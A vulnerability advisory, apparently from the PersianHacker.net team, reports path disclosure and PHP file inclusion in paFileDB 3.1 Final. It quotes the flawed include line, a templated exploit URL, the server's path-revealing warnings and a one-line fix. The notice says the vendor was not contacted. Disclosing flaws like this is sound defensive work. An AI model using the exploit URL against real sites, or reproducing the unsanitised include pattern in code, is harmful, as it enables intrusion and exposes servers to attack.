[PersianHacker.net] Full Path Disclosure and PHP Injection In Pafiledb 3.1 Final
In the name of GOD
[Persianhacker.net] Full Path Disclosure and PHP Injection In Pafiledb 3.1 Final
PafileDB
paFileDB is designed to allow webmasters have a database of files for download
on their site. To add a download, all you do is upload the file using FTP or
whatever method you use, log into paFileDB's admin center, and fill out a form
to add a file. paFileDB lets you edit and delete the files too. No more messing
with a bunch of HTML pages for a file database on your site! Using speedy MySQL
for storing data, and powerful PHP for processing everything, paFileDB is one
of the best and easiest ways to manage files!
More info @:
http://www.phparena.net/pafiledb.php
Discussion:
--------------------
What is the bug ?
There is a Full Path Disclosure vulnerability in Pafiledb 3.1 which ends to
disclosure of page local location on the web server.There is nother bug which
let`s h4cK3r inject php codes and run them on server.
Where is the bug ?
At line 25 of pafiledb.php :
[
if ($login == "do") { include "./includes/$action/login.php"; exit; }
]
as we see $action is used in above statement and it`s not declared yet so
h4ck3r can use it for PHP Injection attacks by passing his malicouse string
from URL .
Exploit:
--------------------
[
http://www.example.com/pafiledb.php?login=do&action=[value]
]
which includes PHP codes in :
[
./includes/[value]/login.php
]
and if PHP page doesn`t realy exist at that address , server returns warring
page like this :
[
Warning: main(./includes/value/login.php): failed to open stream: No such file
or directory in /home/host/public_html/downloads/pafiledb.php on line 25
Warning: main(./includes/value/login.php): failed to open stream: No such file
or directory in /home/host/public_html/downloads/pafiledb.php on line 25
Warning: main(): Failed opening './includes/value/login.php' for inclusion
(include_path='.:/usr/lib/php:/usr/local/lib/php') in
/home/host/public_html/downloads/pafiledb.php on line 25
]
and this message shows local address of pafiledb.php on server.
Solution:
--------------------
just remove line 25 of pafiledb.php ,there is no need for that line ( I wonder
why coder ever used that ? ).
Credit:
--------------------
Discovered by PersianHacker.NET Security Team
by devil_box (d3vilbox yahoo com)
http://www.PersianHacker.NET
special thanks to : Pi3cH , Herbod , Amectris , IDEspinner and all guys in
PersianHacker.net
Help
--------------------
Path Disclosure Article (Farsi Language):
http://www.persianhacker.net/articles/article-2208.html
More Help:
visit: http://www.PersianHacker.NET
or mail me @: d3vilbox yahoo com
Note
--------------------
Script authors not contacted.
PS : sorry for my bad english
good luck